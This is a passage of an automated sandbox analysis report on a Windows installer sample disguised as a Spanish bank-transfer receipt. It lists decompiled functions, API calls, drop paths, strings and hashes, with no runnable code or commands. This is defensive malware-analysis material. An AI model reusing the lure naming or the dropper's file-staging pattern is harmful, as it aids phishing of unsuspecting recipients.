|w, xrefs: 0040550A

Memory Dump Source

Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendChangeClientDataEmptyFindLockMetricsNotificationOpenSystemThreadTrackUnlock
String ID: {$|w$&B
API String ID: 4154960007-1835816524
Opcode ID: 2a917bbd3b44fd9cb5b6d0897a12355830e6d7475328c9c4ea58580c84b5c048
Instruction ID: b072520f5ee80a331e4e918265d0c1a5052efaeab479527f9264255038cc5675
Opcode Fuzzy Hash: 2a917bbd3b44fd9cb5b6d0897a12355830e6d7475328c9c4ea58580c84b5c048
Instruction Fuzzy Hash: BDB13B71900208FFDB219F60DD89AAE7B79FB44355F10803AFA01B61A0C7755E92DF69

Uniqueness

Uniqueness Score: -1.00%

Function 0040580B Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNELBASE(?,?,76BF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405834
lstrcatW.KERNEL32(dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,\*.*), ref: 0040587C
lstrcatW.KERNEL32(?,00409014), ref: 0040589F
lstrlenW.KERNEL32(?,?,00409014,?,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,?,?,76BF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058A5
FindFirstFileW.KERNELBASE(dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,?,?,?,00409014,?,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,?,?,76BF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058B5
FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405955
FindClose.KERNEL32(00000000), ref: 00405964

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405818
\*.*, xrefs: 00405876
"C:\Users\user\Desktop\comprobante de transferencia.exe", xrefs: 0040580B
dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon, xrefs: 00405864, 0040586A, 0040587B, 004058B4

Memory Dump Source

Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\comprobante de transferencia.exe"$C:\Users\user\AppData\Local\Temp\$\*.*$dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon
API String ID: 2035342205-893253288
Opcode ID: e5205ecd88fce5ccf5828815dd77ba019690641696c58a1a3b737e95854e38d1
Instruction ID: b6454d918ebd5faba2d20934ef042a1c7892e73fe5aa147b237895e66f915a66
Opcode Fuzzy Hash: e5205ecd88fce5ccf5828815dd77ba019690641696c58a1a3b737e95854e38d1
Instruction Fuzzy Hash: 0041BF71900A14FACB21AB658C89EBF7678EB41768F10817BF801751D1D77C4981DEAE

Uniqueness

Uniqueness Score: -1.00%

Function 00405648 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 0040568B
GetLastError.KERNEL32 ref: 0040569F
SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004056B4
GetLastError.KERNEL32 ref: 004056BE

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 0040566E
s@, xrefs: 0040567D
C:\Users\user\Desktop, xrefs: 00405648

Memory Dump Source

Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$s@
API String ID: 3449924974-2404651315
Opcode ID: 1b08ca72398e2981408f93d34e223770c5590cbaa7956eb772955fb128fddff0
Instruction ID: 58cf5789918ac3341f57974bf76304b0811093b13c64c6dd82c549f991abc1cf
Opcode Fuzzy Hash: 1b08ca72398e2981408f93d34e223770c5590cbaa7956eb772955fb128fddff0
Instruction Fuzzy Hash: 6D010871D14219DAEF119FA0D8487EFBFB8EF14354F40853AE909B6190D3799604CFAA

Uniqueness

Uniqueness Score: -1.00%

Function 0040635D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(76BF3420,00425738,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,00405B1F,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,00000000,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,76BF3420,?,C:\Users\user\AppData\Local\Temp\,0040582B,?,76BF3420,C:\Users\user\AppData\Local\Temp\), ref: 00406368
FindClose.KERNEL32(00000000), ref: 00406374

Strings

dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon, xrefs: 0040635D
8WB, xrefs: 0040635E

Memory Dump Source

Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: 8WB$dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon
API String ID: 2295610775-1340106231
Opcode ID: 4919aa1d8c56feb8b367bbb1b86ee1180edd575772c83518e79227edefbba0cf
Instruction ID: 8488419dd32d28aa1913c95702376fed147eab6209e3de196541cdf70887181d
Opcode Fuzzy Hash: 4919aa1d8c56feb8b367bbb1b86ee1180edd575772c83518e79227edefbba0cf
Instruction Fuzzy Hash: BED01231949120ABC31417786D0C88B7A599F553317218E33F82AF53E0C3348C2586E9

Uniqueness

Uniqueness Score: -1.00%

Function 004066E2 Relevance: 5.4, APIs: 4, Instructions: 382COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e2f680ccc61635b902b5d27a35f9f4c181eb1db892f7aa35b7a4bb0f1103339
Instruction ID: 8bf6f29b28aad36262c5774fab9fc5fc8376212b20b0a75e389b428f0a59168b
Opcode Fuzzy Hash: 0e2f680ccc61635b902b5d27a35f9f4c181eb1db892f7aa35b7a4bb0f1103339
Instruction Fuzzy Hash: B5F16571D00229CBCF18CFA8C8946ADBBB1FF44305F25856ED856BB281D7785A9ACF44

Uniqueness

Uniqueness Score: -1.00%

Function 004027FB Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 0040280A

Memory Dump Source

Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 46bfe881245e9c09c60a9812fea19b817693455353fba4155f8684d2f21f36a4
Instruction ID: 35ddb734ec7d865f8f709f830fd12decc1a753c42de70ab183506872ff8e9077
Opcode Fuzzy Hash: 46bfe881245e9c09c60a9812fea19b817693455353fba4155f8684d2f21f36a4
Instruction Fuzzy Hash: 0DF08271A00114DBC711EFA4DD49AAEB374FF44324F20457BF115F21E1D7B899409B29

Uniqueness

Uniqueness Score: -1.00%

Function 00403C06 Relevance: 59.8, APIs: 32, Strings: 2, Instructions: 345
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C42
ShowWindow.USER32(?), ref: 00403C5F
DestroyWindow.USER32 ref: 00403C73
SetWindowLongW.USER32(?,00000000,00000000), ref: 00403C8F
GetDlgItem.USER32(?,?), ref: 00403CB0
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403CC4
IsWindowEnabled.USER32(00000000), ref: 00403CCB
GetDlgItem.USER32(?,?), ref: 00403D79
GetDlgItem.USER32(?,00000002), ref: 00403D83
SetClassLongW.USER32(?,000000F2,?), ref: 00403D9D
SendMessageW.USER32(0000040F,00000000,?,?), ref: 00403DEE
GetDlgItem.USER32(?,00000003), ref: 00403E94
ShowWindow.USER32(00000000,?), ref: 00403EB5
KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403EC7
EnableWindow.USER32(?,?), ref: 00403EE2
GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 00403EF8
EnableMenuItem.USER32(00000000), ref: 00403EFF
SendMessageW.USER32(?,000000F4,00000000,?), ref: 00403F17
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F2A
lstrlenW.KERNEL32(004226E8,?,004226E8,00428200), ref: 00403F53
SetWindowTextW.USER32(?,004226E8), ref: 00403F67
ShowWindow.USER32(?,0000000A), ref: 0040409B

Strings

&B, xrefs: 00403F3F
|w, xrefs: 00403FB5

Memory Dump Source

Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID: |w$&B
API String ID: 3282139019-1335198338
Opcode ID: 9a0603423a15e753b59f3bba80cdb29a1d953a93d90d9a1e173928d4099cede9
Instruction ID: 95f6c8bb4d7d19f6e547f96282e94f2ad2b423d9adc133d8208fe863fff8d237
Opcode Fuzzy Hash: 9a0603423a15e753b59f3bba80cdb29a1d953a93d90d9a1e173928d4099cede9
Instruction Fuzzy Hash: 6CC1A071A04204BBDB316F61ED85E2B3AA8FB95705F40053EF601B11F1C779A892DB2E

Uniqueness

Uniqueness Score: -1.00%

Function 00403863 Relevance: 49.2, APIs: 14, Strings: 14, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004063F4: GetModuleHandleA.KERNEL32(?,00000020,?,004032D3,00000009), ref: 00406406
Part of subcall function 004063F4: GetProcAddress.KERNEL32(00000000,?), ref: 00406421

GetUserDefaultUILanguage.KERNELBASE(00000002,76BF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\comprobante de transferencia.exe",00000000), ref: 0040387D

Part of subcall function 00405F61: wsprintfW.USER32 ref: 00405F6E

lstrcatW.KERNEL32(1033,004226E8), ref: 004038E4
lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven,1033,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000,00000002,76BF3420), ref: 00403964
lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven,1033,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000), ref: 00403977
GetFileAttributesW.KERNEL32(Call), ref: 00403982
LoadImageW.USER32(00000067,?,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven), ref: 004039CB
RegisterClassW.USER32(004281A0), ref: 00403A08
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403A20
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403A55
ShowWindow.USER32(00000005,00000000), ref: 00403A8B
GetClassInfoW.USER32(00000000,RichEdit20W,004281A0), ref: 00403AB7
GetClassInfoW.USER32(00000000,RichEdit,004281A0), ref: 00403AC4
RegisterClassW.USER32(004281A0), ref: 00403ACD
DialogBoxParamW.USER32(?,00000000,00403C06,00000000), ref: 00403AEC

Strings

RichEdit, xrefs: 00403ABE
&B, xrefs: 0040388F
.exe, xrefs: 00403971
1033, xrefs: 00403883, 004038DF
RichEd20, xrefs: 00403A91
C:\Users\user\AppData\Local\Temp\, xrefs: 00403868
"C:\Users\user\Desktop\comprobante de transferencia.exe", xrefs: 00403867
RichEd32, xrefs: 00403A9F
C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven, xrefs: 004038F3, 004038FB, 0040399E, 004039A4, 004039B4
.DEFAULT\Control Panel\International, xrefs: 004038CF
Control Panel\Desktop\ResourceLocale, xrefs: 00403897
Call, xrefs: 0040392B, 00403934, 00403942, 00403991, 00403997
RichEdit20W, xrefs: 00403AAF, 00403AB5
_Nb, xrefs: 004039E7, 00403A4F

Memory Dump Source

Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\comprobante de transferencia.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb$&B
API String ID: 606308-215983927
Opcode ID: cdbcb31e795f676d20caa65ef3318a0b5d744cae9e788896206eebbc679a5327
Instruction ID: f2be8ff4b94e14f841e527fec55e0dfc0b13ef39e818ed8fa25aa33126975f24
Opcode Fuzzy Hash: cdbcb31e795f676d20caa65ef3318a0b5d744cae9e788896206eebbc679a5327
Instruction Fuzzy Hash: 6661C670644300BAD720AF669D46F3B3A6CEB84749F40457FF941B62E2D7785902CA7E

Uniqueness

Uniqueness Score: -1.00%

Function 00402DEE Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00402DFF
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\comprobante de transferencia.exe,00000400,?,?,"C:\Users\user\Desktop\comprobante de transferencia.exe",00403500,?), ref: 00402E1B

Part of subcall function 00405BEF: GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\comprobante de transferencia.exe,80000000,00000003,?,?,"C:\Users\user\Desktop\comprobante de transferencia.exe",00403500,?), ref: 00405BF3
Part of subcall function 00405BEF: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000,?,?,"C:\Users\user\Desktop\comprobante de transferencia.exe",00403500,?), ref: 00405C15

GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\comprobante de transferencia.exe,C:\Users\user\Desktop\comprobante de transferencia.exe,80000000,00000003,?,?,"C:\Users\user\Desktop\comprobante de transferencia.exe",00403500,?), ref: 00402E67

Strings

Error launching installer, xrefs: 00402E3E
C:\Users\user\AppData\Local\Temp\, xrefs: 00402DF5
"C:\Users\user\Desktop\comprobante de transferencia.exe", xrefs: 00402DEE
C:\Users\user\Desktop\comprobante de transferencia.exe, xrefs: 00402E05, 00402E14, 00402E28, 00402E48
soft, xrefs: 00402EDC
Null, xrefs: 00402EE5
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00402FC6
C:\Users\user\Desktop, xrefs: 00402E49, 00402E4E, 00402E54
Inst, xrefs: 00402ED3

Memory Dump Source

Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd

Similarity

API ID: File$AttributesCountCreateModuleNameSizeTick
String ID: "C:\Users\user\Desktop\comprobante de transferencia.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\comprobante de transferencia.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 4283519449-1577287286
Opcode ID: 122f358f8e6717933ee25f5196e07cf05b6efbf44d0d507e84cb61a679add872
Instruction ID: 8ad5d6c736a045239d332ae2f481ce07f868331e1a87cba88ca9eb01e54a75c5
Opcode Fuzzy Hash: 122f358f8e6717933ee25f5196e07cf05b6efbf44d0d507e84cb61a679add872
Instruction Fuzzy Hash: 0651E671940206ABDB209F64DE89B9E7BB8EB04394F10407BF904B72D1C7BC9D419BAD

Uniqueness

Uniqueness Score: -1.00%

Function 0040603C Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 207
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersion.KERNEL32(00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsk3D2F.tmp\System.dll,?,004051B0,Skipped: C:\Users\user\AppData\Local\Temp\nsk3D2F.tmp\System.dll,00000000,00000000,0040FEA0), ref: 004060FF
GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 0040617D
GetWindowsDirectoryW.KERNEL32(Call,00000400), ref: 00406190
SHGetSpecialFolderLocation.SHELL32(?,?), ref: 004061CC
SHGetPathFromIDListW.SHELL32(?,Call), ref: 004061DA
CoTaskMemFree.OLE32(?), ref: 004061E5
lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406209
lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsk3D2F.tmp\System.dll,?,004051B0,Skipped: C:\Users\user\AppData\Local\Temp\nsk3D2F.tmp\System.dll,00000000,00000000,0040FEA0), ref: 00406263

Strings

Software\Microsoft\Windows\CurrentVersion, xrefs: 0040614B
Call, xrefs: 00406066, 00406146, 00406167, 0040617C, 0040618F, 004061AB, 004061D6, 00406208, 0040620E, 00406228, 0040623C, 0040625C, 00406262, 0040626E, 004062A1
Skipped: C:\Users\user\AppData\Local\Temp\nsk3D2F.tmp\System.dll, xrefs: 00406061
\Microsoft\Internet Explorer\Quick Launch, xrefs: 00406203

Memory Dump Source

Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd

